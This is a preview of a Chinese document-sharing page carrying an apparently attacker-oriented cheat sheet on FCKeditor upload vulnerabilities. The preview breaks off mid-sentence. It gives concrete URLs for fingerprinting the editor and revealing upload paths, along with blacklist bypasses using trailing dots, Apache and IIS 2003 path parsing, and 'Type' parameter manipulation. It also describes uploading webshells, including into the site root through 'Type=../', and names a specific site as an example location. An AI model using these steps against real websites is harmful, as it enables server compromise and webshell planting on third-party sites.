返回
fckeditor漏洞

fckeditor漏洞

ID:32518674

大小:76.30 KB

页数:9页

时间:2019-02-10

fckeditor漏洞_第1页
fckeditor漏洞_第2页
fckeditor漏洞_第3页
fckeditor漏洞_第4页
fckeditor漏洞_第5页
资源描述:

《fckeditor漏洞》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML

2、页面中第二行“url=/xxx”的部分就是默认基准上传路径Note:[Hell1]截至2010年02月15日最新版本为FCKeditorv2.6.6       [Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言FCKeditor被动限制策略所导致的过滤不严问题影响版本:FCKeditorx.x<=FCKeditorv2.4.3脆弱描述:FCKeditorv2.4.3中File类别默认拒绝上传类型:html

3、htm

4、php

5、php2

6、php3

7、php4

8、php5

9、phtml

10、

11、pwml

12、inc

13、asp

14、aspx

15、ascx

16、jsp

17、cfm

18、cfc

19、pl

20、bat

21、exe

22、com

23、dll

24、vbs

25、js

26、reg

27、cgi

28、htaccess

29、asis

30、sh

31、shtml

32、shtm

33、phtmFckeditor2.0<=2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件上传后它保存的文件直接用的$sFilePath=$sServerDir.$sFileName,而没有使用$sExtension为后缀直接导致在win下在上传文件后面加个.来突破[未测试]而在

34、apache下,因为"Apache文件名解析缺陷漏洞"也可以利用之,详见"附录A"另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘。攻击利用:允许其他任何后缀上传Note:[Hell1]原作:http://superhei.blogbus.com/logs/2006/02/1916091.html利用2003路径解析漏洞上传网马影响版本:附录B脆弱描述:利用2003系统路径解析漏洞的原理,创建类似“bin.asp”如此一般的目录,再在此目

35、录中上传文件即可被脚本解释器以相应脚本权限执行。攻击利用:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspFCKeditorPHP上传任意文件漏洞影响版本:FCKeditor2.2<=FCKeditor2.4.2脆弱描述:FCKeditor在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。在通过editor/file

36、manager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。成功攻击要求config.php配置文件中启用文件上传,而默认是禁用的。攻击利用:(请修改action字段为指定网址):FCKeditor《=2.4.2forphp.htmlNote:如想尝试v2.2版漏洞,则修改Type=任意值即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。TYPE自定

37、义变量任意上传文件漏洞影响版本:较早版本脆弱描述:通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。攻击利用:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:http://www.heimian.com/UserFiles/al

38、l/1.asp"Type=all"这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.比如输入:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp网马就可以传到网站的根目录下.Note:如找不到默认上传文件夹可检查此文件:fckeditor/editor/filemanager

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。